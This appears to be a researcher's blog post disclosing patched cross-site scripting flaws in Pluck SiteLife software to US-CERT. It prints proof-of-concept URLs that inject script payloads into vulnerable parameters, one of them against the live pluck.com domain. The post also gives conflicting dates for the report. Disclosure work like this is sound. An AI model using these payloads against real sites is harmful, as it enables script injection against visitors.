On November 30, 2011 I reported to US-CERT that I found multiple XSS vulnerabilities in Demand Media's Pluck SiteLife software. The details of the vulnerabilities (now patched) were published yesterday as US-CERT Vulnerability Note VU#400619.

Heres the original report I sent to US-CERT and on November 30, 2012:

I would like to report multiple XSS vulnerabilities.
...

Here are the vulnerability details for Pluck:

This demonstrates multiple XSS vulnerabilities in the Pluck SiteLife Software. According to a sales associate, "The SiteLife product was rolled into a broad social/community platform offering about 2.5 years ago. It's simply called Pluck now and Pluck 5 is the latest version." The version of Pluck that is exploitable is unknown by me at this time.

Here are a few of the known vulnerable URL's and URL parameters:

http://sitelife.example.host/ver1.0/Direct/Process?referrerURL=x&jsonRequest=<body%20onload=alert(1)//>

(Internet Explorer)
http://sitelife.example.host/ver1.0/Direct/jsonp.htm?r=<img%20src=x%20onerror=alert(2)//>&cb=<body%20onload=alert(1)//>

(Internet Explorer)
http://sitelife.example.host/ver1.0/sys/jsonp.app/.htm?cb=<img%20src=x%20onerror=alert(1)>&widget_path=pluck%2fuser%2fpersona%wffirstperson%2fprofile.app

In addition to the "cv", "jsonRequest", and "r" parameters, the "ctk" parameter is also vulnerable in some instances.

Here is a proof of concept affecting the pluck.com domain: http://sitelife.pluck.com/ver1.0/direct/process?referrerURL=x&jsonRequest=<body%20onload=alert(1)//>

Here are SOME of the sites that appear to be using the vulnerable SiteLife software. ...

I go on to list over 40 popular websites running Pluck SiteLife software that have the vulnerability, which I won't list here.

Tomorrow, I will post an in-depth look at XSS in Ajax Web Applications and tell you why some of these vulnerabilities were Internet Explorer specific.